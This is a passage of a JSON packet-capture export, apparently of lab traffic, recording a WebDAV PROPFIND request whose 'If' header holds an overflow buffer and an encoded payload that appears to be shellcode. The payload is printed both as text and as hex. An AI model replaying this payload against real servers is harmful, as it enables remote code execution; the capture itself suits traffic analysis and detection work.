<EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/KsTXxyvOLVWEhJAeVDuhuWKcaeKVopIOXOXyxMdVjciXNSViaCJsAWalHsGGqvfvNwTOubuBGKlMcDmXR<58><52><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "432"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.848209000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.848209000",
|
||
"frame.time_delta": "0.000064000",
|
||
"frame.time_delta_displayed": "0.003731000",
|
||
"frame.time_relative": "17.099149000",
|
||
"frame.number": "440",
|
||
"frame.len": "289",
|
||
"frame.cap_len": "289",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "275",
|
||
"ip.id": "0x0000e1dd",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00004ea0",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "46503",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "46503",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "66",
|
||
"tcp.len": "223",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1186562",
|
||
"tcp.nxtseq": "1672",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3108774620",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00008742",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:70:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:70:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868656",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000393000",
|
||
"tcp.analysis.bytes_in_flight": "1671",
|
||
"tcp.analysis.push_bytes_sent": "1671"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000668000",
|
||
"tcp.time_delta": "0.000064000"
|
||
},
|
||
"tcp.payload": "31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "439",
|
||
"tcp.segment": "440",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1671",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4b:72:57:62:65:41:55:53:6c:67:64:74:4e:78:43:41:77:52:74:6f:67:79:58:50:66:50:58:4b:58:43:67:50:62:6c:4a:56:4e:57:58:57:50:45:48:66:63:42:61:78:4b:43:70:6d:46:67:5a:51:59:6f:59:57:57:57:7a:62:69:43:63:58:47:6a:41:6b:58:49:74:6d:53:4b:63:61:e6:99:96:e7:a9:b8:e4:a1:8e:e6:95:87:e6:99:b1:e4:a5:b7:e4:95:9a:e6:89:92:e5:a1:83:e7:91:b7:e7:91:aa:e7:95:81:e4:b5:93:e5:8d:8c:e7:89:94:e6:91:8a:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:9d:92:e6:a9:92:e5:9d:b9:e5:85:87:e5:9d:96:e6:a5:8c:e6:95:8c:e5:81:9a:e5:8d:90:e4:a5:98:e5:a9:94:e4:8d:b9:e6:95:86:e6:bd:b5:e4:a1:8e:e4:9d:8f:e5:9d:94:e6:b5:b7:e5:85:a9:e5:a9:b2:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:50:7a:69:59:61:54:62:69:71:71:59:51:6a:68:69:50:4e:63:62:68:47:76:43:4a:56:41:61:77:42:66:48:45:6e:6a:52:41:49:4f:56:53:4e:41:57:57:48:63:4f:58:67:43:6d:46:4d:4b:4e:68:62:68:59:5a:4d:46:72:49:73:41:61:4d:6b:76:4e:42:68:79:49:42:52:53:54:48:e6:a1:87:e6:8d:a5:e6:a9:ad:e7:9d:8d:e6:91:88:e4:bd:ba:e4:a1:92:e5:89:af:e5:a1:8d:e5:9d:8e:e6:a1:86:e5:a1:ae:e5:a9:84:e7:95:af:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:95:94:e5:a9:8e:e4:91:81:e7:85:87:e1:8f:80:e6:a0:83:e6:b1:91:e4:99:b5:e6:9d:a2:e4:ad:8d:e7:81:b8:e5:81:a1:e4:8d:82:e5:85:a1:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/KrWbeAUSlgdtNxCAwRtogyXPfPXKXCgPblJVNWXWPEHfcBaxKCpmFgZQYoYWWWzbiCcXGjAkXItmSKca<63><61><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/PziYaTbiqqYQjhiPNcbhGvCJVAawBfHEnjRAIOVSNAWWHcOXgCmFMKNhbhYZMFrIsAaMkvNBhyIBRSTH<54><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LO